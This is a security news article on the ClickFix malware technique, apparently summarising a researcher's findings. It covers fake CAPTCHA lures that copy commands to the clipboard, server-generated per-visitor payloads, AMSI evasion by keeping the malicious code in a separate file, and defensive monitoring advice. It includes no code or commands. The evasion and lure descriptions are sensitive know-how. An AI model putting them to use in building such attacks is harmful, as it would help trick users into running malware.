Recent investigations have unveiled an advanced method of malware distribution driven by API-powered servers. This approach, associated with the notorious ClickFix technique, has been dissected by security researcher Bert-Jan Pals. His findings, presented at OrangeCon in early June and detailed on June 30, highlight a sophisticated system where each visitor receives uniquely disguised malware, bypassing traditional security measures.
Understanding ClickFix: A Simple Yet Effective Threat
ClickFix employs a straightforward but effective tactic. It lures users into executing malware themselves by displaying misleading CAPTCHA or error messages. Hidden JavaScript commands are copied to the clipboard, prompting users to paste and execute them. This approach circumvents conventional antivirus systems, contributing to a significant rise in cases. ESET reported a 517% increase in occurrences from late 2024 into 2025, with Microsoft’s 2025 Digital Defense Report noting ClickFix as a major initial-access vector.
API-Driven Payloads: A New Era of Malware Delivery
The research reveals how payloads are dynamically generated from backend servers, functioning like an on-demand service. These servers create unique commands for each request, wrapped in varying encryption layers, yet ultimately delivering the same script through PowerShell. This method ensures that while the disguise may change, the core malware remains consistent, adapting to users’ operating systems and languages.
Pals’ analysis shows that this ‘as-a-service’ model is not just a naming convention. It represents a commercialized system where attackers can procure ClickFix builders, enhancing the threat’s reach and complexity. The payload generation process is continuously evolving, potentially altering the malware for each target in the near future.
Emerging Techniques and Global Implications
A new method involves downloading files to a user’s system, with innocuous-looking clipboard commands orchestrating their execution. This tactic evades AMSI, Microsoft’s script scanning tool, by keeping the actual malicious code in a separate file. The shift towards using Windows Terminal instead of the Run box for execution has further obfuscated detection efforts.
ClickFix is no longer solely a tool for criminals. State-sponsored groups from Russia, Iran, and North Korea have integrated it into their operations, and variations like FileFix and DownloadFix have emerged. Security firm Expel identified a significant ClearFake campaign, potentially affecting over 147,000 systems since August 2025.
Defensive Measures and Future Outlook
For defenders, the focus should remain on monitoring process chains rather than clipboard content. Tools like explorer.exe or WindowsTerminal.exe launching PowerShell or cmd should be scrutinized. Behavioral EDR, application control, and user education remain vital. Additionally, vigilance is needed for one-liners affecting the Downloads folder.
Researcher Pals emphasizes that ClickFix is an enduring threat, continuously evolving as defenders adapt. The dynamic nature of its payload servers ensures its persistence. The security community must remain alert to potential changes in the malware itself, beyond its current configurations.
